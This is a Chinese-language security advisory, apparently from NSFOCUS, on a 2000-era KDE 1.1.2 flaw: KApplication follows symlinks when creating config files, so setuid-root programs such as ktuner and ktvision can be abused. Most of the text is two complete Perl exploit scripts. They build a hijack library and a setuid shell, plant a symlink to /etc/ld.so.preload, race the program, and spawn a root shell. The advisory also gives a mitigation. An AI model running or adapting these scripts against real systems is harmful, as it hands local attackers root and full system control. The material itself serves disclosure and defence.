安全研究

安全漏洞
KDE KApplication {} 配置文件安全漏洞

发布日期:2000-06-01
更新日期:2000-06-02

受影响系统:
KDE 1.1.2
+
  SuSE 6.4
描述:
KDE在对配置文件处理上存在一个安全漏洞,KApplication类没有安全的创建配置文件,本地
用户在执行setuid root的KDE程序(例如:ktvision 和 ktuner)时可以创建任意文件。这可能
导致用户获得root权限。

有问题的代码在KApplication类中:

KApplication::init() :
    
    ...
    
    // now for the local app config file
    QString aConfigName = KApplication::localkdedir();
    aConfigName += "/share/config/";
    aConfigName += aAppName;
    aConfigName += "rc";

    QFile aConfigFile( aConfigName );
    ...

这个类的函数中没有检查要创建的文件是不是链接,因而用户可以创建任意的系统文件,例如共享库
等等,并可能进一步获得系统的控制权。

<* 来源:Sebastian "Stealth" Krahmer  / TESO
         http://www.cs.uni-potsdam.de/homepages/students/linuxer/
         http://teso.scene.at/
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

========================= 7350ktuner begin ================================
#!/usr/bin/perl

#
# 7350ktuner! The ktuner-hack.
# (a.k.a. kil3r for some reason :)
#
# Just execute. Gives instant rootshell kiddie!
# If only ktuner is setuid-root and vulnerable as with
# SuSE 6.4!
#
# When has this stupid race an end?
#
# Bugdiscovery is due to Sebastian Krahmer.
# http://www.cs.uni-potsdam.de/homepages/students/linuxer
#
#
# Greets as always to TESO, security.is, lam3rz ... you all
# know who you are.
#
#

my $rcfile = $ENV{"HOME"}."/.kde/share/config/ktunerrc";

$ENV{"PATH"}.=":/opt/kde/bin";

print ">>Get a feeling on GUI's and how secure they are.<< Stealth.\n";

print "Creating hijack-lib ...\n";
open O, ">/tmp/boom.c" or die "open(boom.c..)";
print O<<_EOF_;
#include <sys/types.h>

int time(void *v)
{
    chown("/tmp/boomsh", 0, 0);
    chmod("/tmp/boomsh", 06755);
    unlink("/etc/ld.so.preload");
    exit(1);
}
_EOF_
close O;

print "Compiling hijack-lib ...\n";
`cc -c -fPIC /tmp/boom.c -o /tmp/boom.o`;
`cc -shared /tmp/boom.o -o /tmp/boom.so`;

open O, ">/tmp/boomsh.c" or die "open(boomsh.c ...)";
print O<<_EOF2_;
#include <stdio.h>
int main()
{
    char *a[] = {"/bin/sh", 0};
    setuid(0); setregid(0, 0);
    execve(a[0], a, 0);
    return 0;
}
_EOF2_
close O;

print "Compile shell ...\n";
`cc /tmp/boomsh.c -o /tmp/boomsh`;

umask 0;

unlink $rcfile;
symlink "/etc/ld.so.preload", $rcfile;

print "Invoking vulnerable program (ktuner)...\n";

if (fork() == 0) {
    `ktuner`;
    exit 0;
} else {
    sleep(3);
    kill 9, `pidof ktuner`;
}

open O, ">/etc/ld.so.preload" or die "Huh? Can't open preload.";
print O "/tmp/boom.so";
close O;
`/usr/bin/passwd`;

# let it look like if we have sth. to do. :)
sleep 3;
print "Welcome. But as always: BEHAVE!\n";
system("/tmp/boomsh");

========================= 7350ktuner end ================================

========================= 7350ktvision begin ================================
#!/usr/bin/perl

#
# 7350ktvision! The ktvision-hack.
#
# Just execute. Gives instant rootshell kiddie!
# If only ktvision is setuid-root and vulnerable as with
# SuSE 6.4!
#
#
# Bugdiscovery is due to Sebastian Krahmer.
# http://www.cs.uni-potsdam.de/homepages/students/linuxer
#
# Greets as always to TESO, security.is, lam3rz ... you all
# know who you are.
#
# Special greets to that beautiful black-dressed woman at
# the bus stop. This one is for you. :)
#

my $rcfile = $ENV{"HOME"}."/.kde/share/config/ktvisionrc";

$ENV{"PATH"}.=":/opt/kde/bin";

print ">>Get a feeling on GUI's and how secure they are.<< Stealth.\n";

print "Creating hijack-lib ...\n";
open O, ">/tmp/boom.c" or die "open(boom.c..)";
print O<<_EOF_;
#include <sys/types.h>

int time(void *v)
{
    chown("/tmp/boomsh", 0, 0);
    chmod("/tmp/boomsh", 06755);
    unlink("/etc/ld.so.preload");
    exit(1);
}
_EOF_
close O;

print "Compiling hijack-lib ...\n";
`cc -c -fPIC /tmp/boom.c -o /tmp/boom.o`;
`cc -shared /tmp/boom.o -o /tmp/boom.so`;

open O, ">/tmp/boomsh.c" or die "open(boomsh.c ...)";
print O<<_EOF2_;
#include <stdio.h>
int main()
{
    char *a[] = {"/bin/sh", 0};
    setuid(0); setregid(0, 0);
    execve(a[0], a, 0);
    return 0;
}
_EOF2_
close O;

print "Compile shell ...\n";
`cc /tmp/boomsh.c -o /tmp/boomsh`;

umask 0;

unlink $rcfile;
symlink "/etc/ld.so.preload", $rcfile;

print "Invoking vulnerable program (ktvision)...\n";

if (fork() == 0) {
    `ktvision`;
    exit 0;
} else {
    sleep(3);
    kill 9, `pidof ktvision`;
}

open O, ">/etc/ld.so.preload" or die "Huh? Can't open preload.";
print O "/tmp/boom.so";
close O;
`/usr/bin/passwd`;

# let it look like if we have sth. to do. :)
sleep 3;
print "Welcome. But as always: BEHAVE!\n";
system("/tmp/boomsh");

========================= 7350ktvision end =============================



建议:
临时解决办法:
取消所有的KDE程序的setuid/setgid位


浏览次数:6526
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障